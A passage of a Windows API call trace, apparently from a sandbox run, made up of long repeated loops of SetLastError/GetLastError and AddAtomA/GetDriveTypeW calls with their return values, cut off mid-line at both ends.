GetLastError () returned 0x0 
[0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 [0112.063] SetLastError (dwErrCode=0x0) [0112.063] GetLastError () returned 0x0 
[0112.063] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.064] GetLastError () returned 0x0 [0112.064] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 
[0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.065] GetLastError () returned 0x0 [0112.065] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.066] SetLastError (dwErrCode=0x0) [0112.066] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 
[0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.067] SetLastError (dwErrCode=0x0) [0112.067] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 
[0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 
[0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 
[0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 
[0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.074] SetLastError (dwErrCode=0x0) [0112.074] GetLastError () returned 0x0 [0112.074] SetLastError (dwErrCode=0x0) [0112.074] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0112.074] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) 
returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) 
returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA 